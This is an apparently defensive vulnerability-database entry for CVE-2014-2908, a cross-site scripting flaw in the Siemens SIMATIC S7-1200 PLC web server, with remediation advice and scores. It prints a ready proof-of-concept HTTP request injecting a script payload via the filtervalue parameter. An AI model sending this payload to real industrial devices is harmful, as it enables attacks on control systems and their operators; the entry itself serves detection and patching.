🔙 목록으로 돌아가기

CVE-2014-2908: Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting

TitleSiemens SIMATIC S7-1200 CPU - Cross-Site Scripting
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser.
RemediationUpgrade to v4.0 or later.
CVSS Score4.3
EPSS Score0.38723
CVE IDCVE-2014-2908
CWE IDCWE-79
Tags cve2014 cve xss siemens edb vkev vuln

🔍 Vulnerability Description

A cross-site scripting vulnerability in the integrated web server on Siemens SIMATIC S7-1200 CPU devices 2.x and 3.x allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.

🌐 HTTP Request

GET /Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2014/CVE-2014-2908.yaml

🦈 Packet Capture: ⬇️ Download cve-2014-2908.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A